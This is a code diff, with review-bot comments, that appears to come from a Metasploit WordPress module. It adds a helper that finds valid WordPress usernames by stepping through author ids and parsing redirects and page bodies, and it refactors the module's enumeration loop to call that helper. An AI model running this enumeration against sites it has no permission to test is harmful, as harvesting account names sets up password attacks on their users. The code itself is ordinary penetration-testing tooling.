more methods
parent
68a51f4055
commit
655e2dcf6c
|
@ -54,6 +54,10 @@ module Msf
|
|||
normalize_uri(target_uri.path) + "/?p=#{post_id}"
|
||||
end
|
||||
|
||||
def wp_url_author(author_id)
|
||||
normalize_uri(target_uri.path) + "/?author=#{author_id}"
|
||||
end
|
||||
|
||||
# performs a wordpress login
|
||||
# returns the session cookie on successful login, nil otherwise
|
||||
def wp_login(user, pass)
|
||||
|
@ -93,6 +97,36 @@ module Msf
|
|||
return exists
|
||||
end
|
||||
|
||||
def wp_userid_exists?(user_id)
|
||||
url = wp_url_author(user_id)
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => url
|
||||
})
|
||||
|
||||
if res and res.code == 301
|
||||
uri = URI(res.headers['Location'])
|
||||
# try to extract username from location
|
||||
if uri.to_s =~ /\/author\/([^\/\b]+)\/?/i
|
||||
return $1
|
||||
end
|
||||
uri = "#{uri.path}?#{uri.query}"
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => uri
|
||||
})
|
||||
end
|
||||
|
||||
if res.nil?
|
||||
print_error("#{target_uri} - Error getting response.")
|
||||
elsif res.code == 200 and
|
||||
(res.body =~ /href="http[s]*:\/\/.*\/\?*author.+title="([[:print:]]+)" /i or
|
||||
res.body =~ /<body class="archive author author-(?:[^\s]+) author-(?:\d+)/i)
|
||||
return $1
|
||||
end
|
||||
return nil
|
||||
end
|
||||
|
||||
def wp_post_comment_auth(comment, comment_post_id, login_cookie)
|
||||
_wp_post_comment(comment, comment_post_id, login_cookie, nil, nil, nil)
|
||||
end
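Review bot: In wp_userid_exists?, the second body pattern (`<body class="archive author author-(?:[^\s]+) author-(?:\d+)`) contains only non-capturing groups, so when it is the alternative that matches, `return $1` returns nil and the caller treats an existing author as missing; capturing the slug, `author-([^\s]+) author-(?:\d+)`, fixes that. `URI(res.headers['Location'])` also parses a header supplied by the remote server: a 301 with no Location or a malformed value raises instead of returning nil, so a nil check plus `rescue URI::InvalidURIError` around it would keep one bad response from aborting the run. The method name ends in `?` but returns a username string, so a comment like the one on wp_login, `# returns the username for the given user id, nil if none was found`, would make the contract clear.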
|
||||
|
|
|
@ -49,12 +49,13 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
usernames = []
|
||||
if datastore['ENUMERATE_USERNAMES']
|
||||
vprint_status("#{target_uri} - WordPress Enumeration - Running User Enumeration")
|
||||
usernames = enum_usernames
|
||||
end
|
||||
|
||||
if datastore['VALIDATE_USERS']
|
||||
@users_found = {}
|
||||
vprint_status("#{target_uri} - WordPress Enumeration - Running User Enumeration")
|
||||
vprint_status("#{target_uri} - WordPress Enumeration - Running User validation")
|
||||
each_user_pass { |user, pass|
|
||||
do_enum(user)
|
||||
}
|
||||
|
@ -144,32 +145,10 @@ class Metasploit3 < Msf::Auxiliary
|
|||
def enum_usernames
|
||||
usernames = []
|
||||
for i in datastore['RANGE_START']..datastore['RANGE_END']
|
||||
uri = "#{target_uri}?author=#{i}"
|
||||
print_status "#{target_uri} - Requesting #{uri}"
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => uri
|
||||
})
|
||||
|
||||
if (res and res.code == 301)
|
||||
uri = URI(res.headers['Location'])
|
||||
uri = "#{uri.path}?#{uri.query}"
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => uri
|
||||
})
|
||||
end
|
||||
|
||||
if res.nil?
|
||||
print_error("#{target_uri} - Error getting response.")
|
||||
elsif res.code == 200 and res.body =~ /href="http[s]*:\/\/.*\/\?*author.+title="([[:print:]]+)" /i
|
||||
username = $1
|
||||
username = wp_userid_exists?(i)
|
||||
if username
|
||||
print_good "#{target_uri} - Found user '#{username}' with id #{i.to_s}"
|
||||
usernames << username
|
||||
elsif res.code == 404
|
||||
print_status "#{target_uri} - No user with id #{i.to_s} found"
|
||||
else
|
||||
print_error "#{target_uri} - Unknown error. HTTP #{res.code.to_s}"
|
||||
end
|
||||
end
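Review bot: enum_usernames appears to lose its failure reporting: going by the hunk counts (32 old lines, 10 new; the +/- markers are not visible on this page), the loop now only calls `wp_userid_exists?(i)` and the `elsif res.code == 404` / `else` branches are removed, so a nil result covers a missing id, an unexpected status and a failed request alike. If that reading is right, an `else` branch with `vprint_status "#{target_uri} - No user with id #{i} found"` would keep the per-id outcome visible in the log. If those branches were kept instead, `res` is no longer assigned in this method and they would raise NameError. The end of the method lies outside the hunk, so what it returns cannot be checked from here.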
|
||||
|
||||
|
|